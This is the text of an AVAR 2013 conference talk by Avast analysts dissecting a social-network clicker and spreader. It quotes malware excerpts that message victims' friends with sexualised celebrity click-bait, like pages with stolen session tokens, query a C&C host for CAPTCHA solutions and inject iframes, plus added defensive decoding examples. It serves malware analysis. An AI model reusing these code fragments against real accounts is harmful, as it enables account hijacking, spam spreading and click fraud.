Today, social sites are a big, open vector for people who want to monetize their ideas. But sometimes those ideas are not as legitimate as one would hope. One of the more unscrupulous ways to "earn" money is to steal your identity, email accounts, and/or credit card details. Another is to misuse your computer as a money-making machine for cybercriminals.
Presented at AVAR 2013 by Jan Sirmer and Lukas Hasik, Virus Analysts & Researchers at Avast Software.
18. Change setting in browser
The add-on stores its configuration as browser preferences (preference name, status, type, value); the buri and uri values are obfuscated strings:
Preference       Status    Type    Value
TestAddon.buri   user set  string  lppt >++igg}em*gki+n*tlt;q9
TestAddon.ch     default   string
TestAddon.date   user set  string  1340624313
TestAddon.guid   user set  string  3c94f90903f031a799162872a55742e8
TestAddon.int    user set  string  60
TestAddon.uri    user set  string  '||x2""eakzg9:&i|"b&x'x7}5
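The obfuscated preference values are the first thing an analyst would try to decode. As an added example, not part of the deck, the routine below brute-forces a single-byte XOR key over the TestAddon.buri value and keeps only keys that yield fully printable text containing "http". That the add-on encodes the value with single-byte XOR is an assumption made for this example (the deck does not say how the value is encoded); the input string is copied from the slide as extracted, so the space inside it may be an extraction artefact and will show up as a stray character in the output.

```javascript
// Added example, not code from the AVAR 2013 deck or from the malware.
// Assumption: the TestAddon.buri preference is plain text XORed with one byte.
// The value below is copied from slide 18 as extracted (constructed input for
// this example); the embedded space may be an extraction artefact.
const BURI_VALUE = "lppt >++igg}em*gki+n*tlt;q9";

// XOR every character of s with key (0..255). XOR is its own inverse, so the
// same call both encodes and decodes.
function xorDecode(s, key) {
  let out = "";
  for (let i = 0; i < s.length; i++) {
    out += String.fromCharCode((s.charCodeAt(i) ^ key) & 0xff);
  }
  return out;
}

// True when every character is printable ASCII (0x20..0x7e).
function isPrintable(s) {
  for (let i = 0; i < s.length; i++) {
    const c = s.charCodeAt(i);
    if (c < 0x20 || c > 0x7e) return false;
  }
  return true;
}

// Try all 255 non-zero keys and return those whose plaintext is printable and
// contains the marker we expect in a URL. Key 0 is skipped: it changes nothing.
function bruteForceXor(s, marker = "http") {
  const hits = [];
  for (let key = 1; key < 256; key++) {
    const plain = xorDecode(s, key);
    if (isPrintable(plain) && plain.includes(marker)) {
      hits.push({ key, plain });
    }
  }
  return hits;
}

// Print every candidate key with its plaintext.
for (const h of bruteForceXor(BURI_VALUE)) {
  console.log(`key 0x${h.key.toString(16).padStart(2, "0")}: ${h.plain}`);
}
```

Run it with node. A candidate the loop prints is a lead to confirm against the add-on's own decoding routine, not a verified indicator; the same loop can be pointed at the TestAddon.uri value, which may use a different key or a different scheme entirely.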
20. js_f.php
• Two different ways
1. Spreads malware to other people and also works as a clicker
2. Works only as a clicker
21. Spreading malware
• The script updates the victim's Facebook and Twitter status by posting new status messages
22. Spreading malware
// Lure table: each entry carries a click-bait title, a description, a bit.ly link,
// a thumbnail URL and further parameters used when posting (first entry shown).
var videos = new Array(10);
videos[0] = Array("80", "Kirst*en. Dunst mastur*bating on hidden camera", "It happened in United Stateshotel", "http://bit.ly/MTfe4S", "http://i.imgur.com/NjZPU.jpg", "", "20", "friend", "327065014030715", "431402153539537", "AQBu92VH5GDqrJkp", "2309869772");
var flk = Array();
if ((1 == 1)) {                                         // always true
  var randomnumber = Math.floor(Math.random() * 100);
  if (randomnumber > 0) {                               // true 99 times out of 100
    // ... (excerpt; the slide ends here)
23. Spreading malware
var uri = "http://tol.co/5q";                            // shortened link to the lure
if ((document.location.href.search("tagged.com") > -1)) {
  // On tagged.com: send the link as a message to every friend the script can enumerate
  var ids = get_friends_t(1);
  if (ids.length > 0) {
    for (var i in ids) {
      send_msg(uri, ids[i], "2222")
    }
  } else {
    // No friends found: post the lure as a status update instead
    post_item("LOL Miley Cyrus got caught having s3x " + uri, "2222")
  }
}
24. Functionality
// "Likes" a Facebook page on the victim's behalf through Facebook's own AJAX endpoint.
// fid (post_form_id) and fbdt (fb_dtsg) are the anti-CSRF tokens of the logged-in
// session; they are set elsewhere in the script (not shown), which can read them
// because it runs inside the victim's browser.
function likepage(pageid) {
  var likepost = "fbpage_id=" + pageid +
    "&add=1&reload=1&preserve_tab=true&nctr[_mod]=pagelet_header&post_form_id=" + fid +
    "&fb_dtsg=" + fbdt + "&lsd&post_form_id_source=AsyncRequest";
  var likepage = new XMLHttpRequest();
  likepage.open("POST", "/ajax/pages/fan_status.php?__a=1");
  likepage.send(likepost)
}
25. Functionality
// Builds the request body that asks which of the victim's friends are online
// (excerpt; the request itself is not shown on this slide).
function get_online_friends(limit) {
  var friends = get_friends(limit);
  var friends = make_array(friends);
  friends.sort();
  var postfields = "user=" + uid;          // uid: the victim's own user id, set elsewhere in the script
  for (var i = 0; i < friends.length; i++) {
    postfields += "&available_user_info_ids[" + i + "]=" + friends[i]
  }
26. Functionality
// Asks the attacker's CAPTCHA-solving service for a solution. The request is
// synchronous (third argument false), so the page blocks until the server answers.
function get_solved_captcha(extra_challenge_params, opt) {
  var output = new Array(3);
  var post = new XMLHttpRequest();
  post.open("GET", "http://mp56a.com/fn/cs/api/s_c.php?u=" + escape(extra_challenge_params), false);
  post.send();
  if (post.readyState == 4 && post.status == 200) {
    // The reply is parsed with eval rather than JSON.parse, so any JavaScript
    // the server returns is executed in the victim's browser.
    data = eval('(' + post.responseText + ')');
    console.log(data);
    post[1] = data.key;                    // written to the request object, not to output, as on the slide
    post[2] = data.challenge
  }
  // ... (excerpt; the slide ends here)
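A caveat a practitioner would add to get_solved_captcha: the script hands the C&C reply to eval, so whoever controls (or later takes over) that host can run arbitrary JavaScript in every infected browser, not just return a key and a challenge. The following is an added example, not code from the deck or from the malware; it contrasts the eval pattern with JSON.parse on a constructed reply that is valid JavaScript but not valid JSON. The field names key and challenge are the ones the slide shows; the reply texts and the global variable the hostile reply sets are made up for this demonstration.

```javascript
// Added example, not code from the AVAR 2013 deck or from the malware.
// Two constructed "C&C replies": a benign one and one that is executable
// JavaScript but not JSON (its key value is an expression with a side effect).
const BENIGN_RESPONSE = '{"key":"abc","challenge":"03AHJ_"}';
const HOSTILE_RESPONSE =
  '{"key":(globalThis.evalSideEffect = "ran", "abc"),"challenge":"x"}';

// The pattern used by get_solved_captcha(): evaluate the response as code.
const parseLikeMalware = (text) => eval("(" + text + ")");

// The safe equivalent: parse as data only, then check the shape before use.
function parseSafely(text) {
  const data = JSON.parse(text);
  if (typeof data.key !== "string" || typeof data.challenge !== "string") {
    throw new TypeError("unexpected response shape");
  }
  return { key: data.key, challenge: data.challenge };
}

// Run both parsers over both replies and report what happened.
function demo() {
  const r = {};
  r.evalBenign = parseLikeMalware(BENIGN_RESPONSE).key;       // "abc"
  globalThis.evalSideEffect = undefined;
  r.evalHostile = parseLikeMalware(HOSTILE_RESPONSE).key;     // "abc", but code ran
  r.sideEffectRan = globalThis.evalSideEffect === "ran";      // true
  r.safeBenign = parseSafely(BENIGN_RESPONSE).key;            // "abc"
  try {
    parseSafely(HOSTILE_RESPONSE);
    r.safeHostile = "parsed";
  } catch (e) {
    r.safeHostile = e.name;                                   // "SyntaxError"
  }
  return r;
}

console.log(demo());
```

The hostile reply yields the same key either way, which is the point: the consumer of the eval'd result cannot tell that code ran. JSON.parse rejects the same bytes outright, and the shape check after it catches replies that are valid JSON but not what the caller expects.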
27. Create injected iframe
// Covers the whole page with an iframe loaded from src: pinned to the top-left
// corner at full width and height, so the injected content sits over everything.
function createIframe(src) {
  var ifr = document.createElement("iframe");
  ifr.setAttribute("src", src);
  ifr.style.position = "absolute";
  ifr.style.top = "0";
  ifr.style.left = "0";
  ifr.style.width = "100%";
  ifr.style.height = "100%";
  document.body.appendChild(ifr)
}
// Returns the id attribute of the no-th <img> element inside src.
function get_img_src(src, no) {
  x = src.getElementsByTagName("img");   // x leaks as an implicit global
  return x[no].id
}
// Parses an HTML string into a detached <div> so it can be queried with DOM methods.
function make_dom(src) {
  var tempDiv = document.createElement("div");
  tempDiv.innerHTML = src;
  return tempDiv
}
28. Clicker
• The BHO, Firefox and Chrome payloads each contain a link to a site like
http://resultsz.com/search/anticheat6.php?username=foreste
• That site hosts the list of sites used by all of these "clickers": on every page the
victim visits, a hidden iframe pointing at entries from the list is injected, and the
black hat is paid for the resulting traffic.
29. Summary
• Be aware of social engineering
– Even simple attempts can be successful
• Social networks are used for spreading malware
– More users == more efficiency
• Trendy topics, celebrities and the latest news are often the starting
point for these infection vectors
31. Thank you
Jan Sirmer (sirmer@avast.com)
Senior Virus Analyst
Lukas Hasik (hasik@avast.com)
QA Director
Editor's Notes
Introduction
1) The user clicks on Kirsten's video
2) There is malware behind it
3) The malware secretly infects the user's PC
4) The malware communicates with the C&C, from which it receives a list of sites to click on
5) The malware clicks on the received sites
6) The bad guy receives money
Inside jstest.js are many links to different sites that the user's browser visits, and the attacker earns money from the clicks.